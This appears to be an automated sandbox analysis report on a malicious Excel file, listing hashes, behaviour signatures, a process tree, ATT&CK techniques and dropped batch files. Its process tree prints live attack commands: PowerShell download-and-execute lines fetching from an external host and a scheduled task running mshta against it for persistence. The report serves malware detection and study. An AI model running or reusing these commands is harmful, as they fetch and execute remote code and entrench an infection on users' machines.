Analysis

  • max time kernel
    103s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 07:45

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.16558.xls

  • Size

    33KB

  • MD5

    1d5e697a9549b96a548a76b59eb4e64c

  • SHA1

    413e5fa05e80aa4d7cc13ffe22830f4afc9c0d2f

  • SHA256

    8fe23c29ba0570ad4b2fa152702380863429f97280d3ce26f4194e2593db45c2

  • SHA512

    28a71baaa8462064187172f85da123771a44fd70c33ba23e7bb42b66032eaa7edebc3a93952336d922387cd0bd553e34c847618ac7d3c942500ea53663bc63a0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.16558.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Windows\system32\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2248
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:964
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\system32\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3208
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
      • C:\Windows\system32\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\system32\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3204
      • C:\Windows\system32\cmd.exe
        cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\system32\schtasks.exe
          schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
          4⤵
          • Creates scheduled task(s)
          PID:3128
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4036
      • C:\Windows\system32\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2140

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    abc27673d9c940ad74b41c58391d2412

    SHA1

    9a31a521a521dcd0f974ce6f7a50aecc69a50df0

    SHA256

    cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

    SHA512

    c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    6KB

    MD5

    dd50dd46b3e885f7310952c8f8f9768c

    SHA1

    5abc431c9ec9836e01c9bc4763ae0530eb9a93f8

    SHA256

    acc2f8bfa31f221a3270d2df76873cf2d80dbef1e1670f38f04653023fc754e0

    SHA512

    10d34afd1199297e8f11270adb2fee7a5a5736d1f23758409141f22aa23a1ca5a37ec036d8fd6ac6cf75d961b1f4979df5dcc88062133a53e5bb5378070ebf9b

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • C:\Users\Public\task.bat
    Filesize

    954B

    MD5

    20a395a26f50352dc994664c3e7df533

    SHA1

    9b6407d22297b7af7c49aacd51bf42e51ced7029

    SHA256

    c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

    SHA512

    2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

  • memory/964-159-0x0000000000000000-mapping.dmp
  • memory/964-163-0x00007FFE27E90000-0x00007FFE28951000-memory.dmp
    Filesize

    10.8MB

  • memory/964-164-0x00007FFE27E90000-0x00007FFE28951000-memory.dmp
    Filesize

    10.8MB

  • memory/1008-158-0x0000000000000000-mapping.dmp
  • memory/1872-149-0x0000000000000000-mapping.dmp
  • memory/1940-153-0x000001EE6C9D0000-0x000001EE6C9F2000-memory.dmp
    Filesize

    136KB

  • memory/1940-150-0x0000000000000000-mapping.dmp
  • memory/1940-156-0x00007FFE27E90000-0x00007FFE28951000-memory.dmp
    Filesize

    10.8MB

  • memory/1940-155-0x00007FFE27E90000-0x00007FFE28951000-memory.dmp
    Filesize

    10.8MB

  • memory/2104-170-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-154-0x000002E51BB8A000-0x000002E51BB8C000-memory.dmp
    Filesize

    8KB

  • memory/2104-172-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-146-0x000002E51BB8A000-0x000002E51BB8C000-memory.dmp
    Filesize

    8KB

  • memory/2104-171-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-132-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-138-0x00007FFE0DAE0000-0x00007FFE0DAF0000-memory.dmp
    Filesize

    64KB

  • memory/2104-133-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-169-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-134-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-137-0x00007FFE0DAE0000-0x00007FFE0DAF0000-memory.dmp
    Filesize

    64KB

  • memory/2104-136-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2104-135-0x00007FFE10050000-0x00007FFE10060000-memory.dmp
    Filesize

    64KB

  • memory/2140-145-0x0000000000000000-mapping.dmp
  • memory/2248-143-0x0000000000000000-mapping.dmp
  • memory/2584-152-0x0000000000000000-mapping.dmp
  • memory/3128-167-0x0000000000000000-mapping.dmp
  • memory/3204-144-0x0000000000000000-mapping.dmp
  • memory/3208-147-0x0000000000000000-mapping.dmp
  • memory/4036-142-0x0000000000000000-mapping.dmp
  • memory/4368-151-0x0000000000000000-mapping.dmp
  • memory/4588-166-0x0000000000000000-mapping.dmp
  • memory/4904-139-0x0000000000000000-mapping.dmp
  • memory/4928-140-0x0000000000000000-mapping.dmp
  • memory/4952-141-0x0000000000000000-mapping.dmp